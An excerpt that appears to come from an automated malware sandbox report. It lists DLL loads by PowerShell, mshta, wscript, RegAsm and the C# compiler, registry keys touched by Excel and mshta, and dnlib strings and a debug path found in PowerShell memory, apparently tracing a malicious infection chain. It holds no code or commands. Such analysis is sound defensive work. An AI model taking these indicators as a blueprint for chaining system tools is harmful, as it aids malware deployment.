                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484568461.0000000012648000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.pdb source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.pdb source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.pdbhPB source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
